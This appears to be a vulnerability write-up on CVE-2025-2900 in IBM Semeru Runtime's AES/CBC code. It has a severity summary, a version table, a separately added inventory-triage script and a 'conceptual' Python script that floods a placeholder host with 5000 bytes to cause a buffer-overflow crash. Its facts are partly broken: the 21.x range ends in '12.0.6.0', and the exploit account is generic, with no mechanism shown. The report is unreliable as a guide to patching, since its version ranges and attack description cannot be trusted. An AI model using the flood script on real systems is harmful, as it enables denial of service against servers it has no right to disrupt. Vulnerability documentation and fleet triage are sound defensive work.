Overview
This report provides a detailed analysis of the CVE-2025-2900 vulnerability. This vulnerability affects IBM Semeru Runtime versions 8.0.302.0 through 8.0.442.0, 11.0.12.0 through 11.0.26.0, 17.0.0.0 through 17.0.14.0, and 21.0.0.0 through 12.0.6.0. The issue stems from a flaw in the native AES/CBC encryption implementation, potentially causing system compromise or data leakage.
Vulnerability Summary
CVE ID: CVE-2025-2900
Severity: High (7.5 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Denial of service, potential system compromise and data leakage
Affected Products
Product | Affected Versions
IBM Semeru Runtime | 8.0.302.0 – 8.0.442.0
IBM Semeru Runtime | 11.0.12.0 – 11.0.26.0
IBM Semeru Runtime | 17.0.0.0 – 17.0.14.0
IBM Semeru Runtime | 21.0.0.0 – 12.0.6.0
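A fleet check against the version table above, added here as an example (it is not IBM's code or this report's own). It assumes an inventory of hypothetical "host version" lines. Because the table's 21.x row ends in 12.0.6.0, it flags every 21.x build for manual review rather than guessing that range.

```python
import re

# Inclusive ranges copied from the "Affected Versions" table on this page.
AFFECTED_RANGES = [
    ((8, 0, 302, 0), (8, 0, 442, 0)),
    ((11, 0, 12, 0), (11, 0, 26, 0)),
    ((17, 0, 0, 0), (17, 0, 14, 0)),
]
# The page's 21.x row ends in "12.0.6.0", which cannot bound a 21.x range.
# Assumption of this example: send every 21.x build to manual review.
REVIEW_MAJORS = {21}
VERSION_RE = re.compile(r"^\d+(\.\d+){1,3}$")

def parse_version(text):
    """Turn '17.0.14' or '17.0.14.0' into a zero-padded 4-tuple of ints."""
    text = text.strip()
    if not VERSION_RE.match(text):
        raise ValueError(f"not a dotted Semeru version: {text!r}")
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (4 - len(parts)))

def classify(version_text):
    """Return 'affected', 'review', 'not-listed' or 'unparseable'."""
    try:
        version = parse_version(version_text)
    except ValueError:
        return "unparseable"
    if any(low <= version <= high for low, high in AFFECTED_RANGES):
        return "affected"
    if version[0] in REVIEW_MAJORS:
        return "review"
    return "not-listed"

def triage(inventory_lines):
    """Map 'host version' lines to {host: status}; skip blanks and comments."""
    result = {}
    for line in inventory_lines:
        fields = line.split()
        if len(fields) != 2 or fields[0].startswith("#"):
            continue
        result[fields[0]] = classify(fields[1])
    return result

# Constructed inventory (hypothetical hosts and versions, for illustration).
SAMPLE_INVENTORY = ["app01 17.0.14.0", "app02 17.0.15.0",
                    "batch01 21.0.3.0", "legacy01 1.8.0_442"]

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))
```

Hosts reported as "review" or "unparseable" need their version confirmed by hand before they are counted as clear.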
How the Exploit Works
The exploit works by sending a large volume of data to the server running affected versions of IBM Semeru Runtime. This overloads the buffer in the AES/CBC encryption implementation, causing a buffer overflow. This overflow results in a crash, causing a denial of service. In some instances, it may also lead to system compromise or data leakage.
Conceptual Example Code
import socket
buffer = b"A" * 5000  # oversized payload; sockets send bytes, not str
target_ip = "target_IP"  # placeholder
target_port = 0  # placeholder
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(buffer)
s.close()
In the above sample Python script, an attacker could potentially overload the buffer by sending a large amount of data (b"A" * 5000), causing the system to crash and possibly enabling the exploitation of additional vulnerabilities.
